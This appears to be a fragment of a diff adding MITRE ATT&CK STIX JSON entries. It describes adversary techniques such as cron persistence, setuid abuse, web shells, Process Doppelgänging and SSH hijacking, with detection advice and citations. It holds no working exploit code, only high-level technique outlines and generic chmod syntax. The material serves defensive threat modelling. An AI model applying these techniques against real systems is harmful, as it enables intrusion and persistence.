}, + { + "source_name": "Microsoft CurrentControlSet Services", + "description": "Microsoft. (2017, April 20). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved March 16, 2020.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Install Digital Certificate", + "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", + "created": "2021-03-17T20:32:13.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/003", + "external_id": "T1608.003" + }, + { + "source_name": "DigiCert Install SSL Cert", + "description": "DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.", + "url": "https://www.digicert.com/kb/ssl-certificate-installation.htm" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Local Job Scheduling", + "description": "On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).\n\n### cron\n\nSystem-wide cron jobs are installed by modifying /etc/crontab file, /etc/cron.d/ directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.\n\nThose methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.\n\n### at\n\nThe at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.\n\n### launchd\n\nEach launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called StartCalendarInterval with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_detection": "Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1168", + "external_id": "T1168" + }, + { + "source_name": "Die.net Linux crontab Man Page", + "description": "Paul Vixie. (n.d.). crontab(5) - Linux man page. Retrieved December 19, 2017.", + "url": "https://linux.die.net/man/5/crontab" + }, + { + "source_name": "Die.net Linux at Man Page", + "description": "Thomas Koenig. (n.d.). at(1) - Linux man page. Retrieved December 19, 2017.", + "url": "https://linux.die.net/man/1/at" + }, + { + "source_name": "AppleDocs Scheduling Timed Jobs", + "description": "Apple. (n.d.). Retrieved July 17, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html" + }, + { + "source_name": "Janicab", + "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", + "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Avast Linux Trojan Cron Persistence", + "description": "Threat Intelligence Team. (2015, January 6). Linux DDoS Trojan hiding itself with an embedded rootkit. Retrieved January 8, 2018.", + "url": "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Setuid and Setgid", + "description": "When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAn adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1166", + "external_id": "T1166" + }, + { + "source_name": "setuid man page", + "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", + "url": "http://man7.org/linux/man-pages/man2/setuid.2.html" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Startup Items", + "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "created": "2020-01-15T18:00:33.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037/005", + "external_id": "T1037.005" + }, + { + "source_name": "Startup Items", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Web Shell", + "description": "A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)\n\nWeb shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)\n\n\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM", + "User" + ], + "x_mitre_system_requirements": [ + "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", + "created": "2017-05-31T21:31:13.061Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1100", + "external_id": "T1100" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html", + "external_id": "CAPEC-650" + }, + { + "source_name": "Lee 2013", + "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html" + }, + { + "source_name": "US-CERT Alert TA15-314A Web Shells", + "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", + "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Process Doppelgänging", + "description": "Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Anti-virus", + "Whitelisting by file name or path", + "Signature-based detection" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1186", + "external_id": "T1186" + }, + { + "source_name": "Microsoft TxF", + "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" + }, + { + "source_name": "Microsoft Basic TxF Concepts", + "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" + }, + { + "source_name": "Microsoft Where to use TxF", + "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" + }, + { + "source_name": "BlackHat Process Doppelgänging Dec 2017", + "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.", + "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" + }, + { + "source_name": "hasherezade Process Doppelgänging Dec 2017", + "description": "hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.", + "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" + }, + { + "source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", + "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "SSH Hijacking", + "description": "Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "x_mitre_system_requirements": [ + "SSH service enabled, trust relationships configured, established connections" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1184", + "external_id": "T1184" + }, + { + "source_name": "Slideshare Abusing SSH", + "description": "Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.", + "url": "https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219" + }, + { + "source_name": "SSHjack Blackhat", + "description": "Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.", + "url": "https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf" + }, + { + "source_name": "Clockwork SSH Agent Hijacking", + "description": "Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.", + "url": "https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking" + }, + { + "source_name": "Welivesecurity Ebury SSH", + "description": "M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved January 8, 2018.", + "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "System Language Discovery", + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "created": "2021-08-18T14:06:45.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1614/001", + "external_id": "T1614.001" + }, + { + "source_name": "Malware System Language Check", + "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.", + "url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "Darkside Ransomware Cybereason", + "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.", + "url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware" + }, + { + "source_name": "Securelist JSWorm", + "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.", + "url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/" + }, + { + "source_name": "SecureList SynAck Doppelgänging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T21:07:31.570Z", + "name": "Non-Application Layer Protocol", + "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar", + "Duane Michael" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", + "x_mitre_domains": [ + "enterprise-attack" + ], + 